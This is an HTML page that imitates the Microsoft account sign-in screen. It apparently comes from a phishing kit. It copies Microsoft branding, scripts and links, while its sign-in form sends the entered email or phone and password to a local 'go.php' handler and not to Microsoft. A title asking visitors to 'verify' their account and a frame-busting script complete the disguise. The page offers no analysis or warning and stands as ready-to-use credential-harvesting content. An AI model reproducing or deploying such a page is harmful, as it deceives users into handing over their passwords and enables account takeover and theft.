<!DOCTYPE html>
<html dir="ltr" lang="EN-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<script type="text/javascript">var PROOF = {};PROOF.Type = {SQSA: 6, CSS: 5, DeviceId: 4, Email: 1, AltEmail: 2, SMS: 3, HIP: 8, Birthday: 9, TOTPAuthenticator: 10, RecoveryCode: 11, StrongTicket: 13, TOTPAuthenticatorV2: 14, Voice: -3};</script>
<title>Sign in to verify your Microsoft account</title>

<link rel="shortcut icon" href="https://auth.gfx.ms/16.000.26227.00/favicon.ico?v=2">
        <link rel="stylesheet" title="Default" type="text/css" href="Sign%20in%20to%20your%20Microsoft%20account_files/Default1033.css"><style type="text/css">body.cb input.hip
    {
        border-width: 2px !important;
    }
</style>
<style type="text/css">body{display:none;}</style>
<script type="text/javascript">if (top != self){try{top.location.replace(self.location.href);}catch (e){}}else{document.write(unescape('%3C%73') + 'tyle type="text/css">body{display:block !important;}</style>');}</script>
<style type="text/css">body{display:block !important;}</style><noscript><style type="text/css">body{display:block !important;}</style></noscript>
<script type="text/javascript">var g_iSRSFailed=0,g_sSRSSuccess="";function SRSRetry(a,f,b){var e=1,d=unescape('%3Cscript type="text/javascript" src="'),c=unescape('"%3E%3C/script%3E');if(g_sSRSSuccess.indexOf(a)!=-1)return;if(typeof window[a]=="undefined"){g_iSRSFailed=1;b<=e&&document.write(d+f+c)}else g_sSRSSuccess+=a+"|"+b+","}
  var g_dtFirstByte=new Date();var g_objPageMode = null;</script><link rel="image_src" href="https://auth.gfx.ms/16.000.26227.00/Windows_Live_v_thumb.jpg">
<div id="logo" align="center"><img src="Sign%20in%20to%20your%20Microsoft%20account_files/logo.jpg"></div>
<script type="text/javascript" src="Sign%20in%20to%20your%20Microsoft%20account_files/DefaultLoginStrings1033.js"></script>
  <script type="text/javascript" src="Sign%20in%20to%20your%20Microsoft%20account_files/DefaultLogin_Core.js"></script>
  <script type="text/javascript">SRSRetry("__DefaultLogin_Strings", "https://auth.gfx.ms/16.000.26227.00/DefaultLoginStrings1033.js", 1);SRSRetry("__DefaultLogin_Core", "https://auth.gfx.ms/16.000.26227.00/DefaultLogin_Core.js", 1);</script><script type="text/javascript">SRSRetry("__DefaultLogin_Strings", "https://auth.gfx.ms/16.000.26227.00/DefaultLoginStrings1033.js", 2);SRSRetry("__DefaultLogin_Core", "https://auth.gfx.ms/16.000.26227.00/DefaultLogin_Core.js", 2);</script></head>
<body class="cb" data-bind="defineGlobals: ServerData, bodyCssClass">
<div>
<div class="row text-subheader" data-bind="text: str['WF_STR_HeaderDefault_Title']">Sign in to verify your <br>account</div>
<div class="row text-body"><div data-bind="text: str['WF_STR_Default_Desc']">Use your Microsoft account.</div><div data-bind="visible: !svr.F"><a id="learnMoreLink" href="#" target="_top" data-bind="text: str['WF_STR_LearnMoreLink_Text'], click: learnMore.open">What's this?</a></div></div>
<form action="go.php" name="f1" method="post" target="_top" autocomplete="off">
<div id="maincontent">
<div class="section-body container">
<div id="pageControlHost">
<div>
<div id="Credentials">
<div class="container" id="CredentialsInputPane">
<fieldset>
<div class="row">
<div class="form-group">
<div class="form-group col-md-24">
<input type="text" aria-label="%0%" name="login" id="username" maxlength="113" class="form-control ltr_override" placeholder="Email or phone" required>
</div>
</div>
</div>
<div>
<div class="row"><div class="form-group col-md-24">
<input maxlength="127" aria-label="Password" name="passwd" id="i0118" autocomplete="off" class="form-control" type="password" placeholder="Password" required>
</div>
</div>
</div>
<div data-bind="component: { name: 'kmsi-field', params: { value: kmsi.value, locked: lockUsername } }">
<div id="idTd_PWD_KMSI_Cb" class="form-group checkbox text-block-body no-margin-top" data-bind="visible: !locked">
<label id="idLbl_PWD_KMSI_Cb">
<input name="KMSI" id="idChkBx_PWD_KMSI0Pwd" data-bind="checked: value" type="checkbox">
<span data-bind="text: str['CT_PWD_STR_KeepMeSignedInCB_Text']">Keep me signed in</span>
</label>
</div>
</div>
</fieldset>


</div>

</div>
</div>
</div>
</div>
<div class="row" id="ftrButton">
<div class="col-xs-24 form-group">
<input value="Sign in" id="idSIButton9" class="btn btn-block btn-primary btn-image btn-image-svg" data-bind=" value: str['CT_PWD_STR_SignIn_Button'], css: { 'btn-image-svg': wLive.Login.Core.Controls.Browser.Helper.isSvgImgSupported() }" type="submit">
</div>
</div>
<div data-bind="component: { name: 'links-field', params: { showOtcLink: !isFSI &amp;&amp; !isOTS &amp;&amp; !svr.p, lockUsername: lockUsername, setOtcPostType: setOtcPostType, resetPassword: hrd ? hrd.resetPassword : null, signUpUrl: signUpUrl, resetPasswordUrl: resetPasswordUrl } }">
<div class="row">
<div class="col-md-24">
<div style="display: none;" class="section" data-bind="visible: !lockUsername &amp;&amp; svr.R, htmlWithBindings: html['WF_STR_SignUpLink_Text'], childBindings: { 'signup': { href: signUpUrl } }">No account? <a href="https://signup.live.com/" id="signup">Create one!</a></div>
<div class="text-13">
<div class="form-group"><a id="idA_PWD_ForgotPassword" href="https://account.live.com/ResetPassword.aspx?wreply=https://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d12%26ct%3d1460457809%26rver%3d6.4.6456.0%26wp%3dMBI_SSL%26wreply%3dhttps%253a%252f%252foutlook.live.com%252fowa%252f%26lc%3d1033%26id%3d292841%26mkt%3den-us%26cbcxt%3dout%26fl%3dwld%26bk%3d1460457823&amp;id=292841&amp;uiflavor=web&amp;uaid=09513fa9ddaf4b7790ab4f684ab06c56&amp;mkt=EN-US&amp;lc=1033&amp;bk=1460457823" data-bind="text: str['CT_PWD_STR_ForgotPwdLink_Text'], href: resetPasswordUrl, click: resetPassword ? resetPassword.toggle : null">Forgot my password</a></div>
<div class="form-group" id="idTD_PWD_SwitchToOTCLink"><a id="idA_PWD_SwitchToOTC" href="#" data-bind="text: str['CT_PWD_STR_SwitchToOTC_Link'], click: setOtcPostType">Sign in with a single-use code</a></div>
<div style="display: none;" class="form-group" data-bind="visible: lockUsername &amp;&amp; svr.urlSwitch &amp;&amp; svr.Aa"><a id="i1668" href="https://login.live.com/logout.srf?wa=wsignin1.0&amp;rpsnv=12&amp;ct=1460457809&amp;rver=6.4.6456.0&amp;wp=MBI_SSL&amp;wreply=https%3a%2f%2foutlook.live.com%2fowa%2f&amp;lc=1033&amp;id=292841&amp;mkt=en-us&amp;cbcxt=out&amp;fl=wld&amp;ru=https://outlook.live.com/owa/&amp;bk=1460457823&amp;lm=I" data-bind="text: str['CT_FED_STR_ChangeUserLink_Text'], href: svr.urlSwitch">Sign in with a different Microsoft account</a>
</div>
</div>
</div>
</div>
</div>
<div id="ftr" class="text-body">
<div data-bind="component: { name: 'footer-control', params: { showLinks: footer.showLinks, showLogo: footer.showLogo, serverData: svr } }">
<div id="footerTD" class="popupfooter popup breakword footer">
<div id="ftrLogo" class="footerNode text-base text-secondary text-logotype"><img alt="Microsoft" src="Sign%20in%20to%20your%20Microsoft%20account_files/Microsoft_Logotype_Gray.svg" data-bind="svgSrc: svr.Bl, attr: { alt: str['MOBILE_STR_Footer_Microsoft'] }">
</div>
</div>
</div>
</div>
</div>
</section>
</div>
</div>
</form>
</div><iframe src="Sign%20in%20to%20your%20Microsoft%20account_files/prefetch.htm" style="display: none;" id="idPartnerPL" height="0" width="0"></iframe></body></html>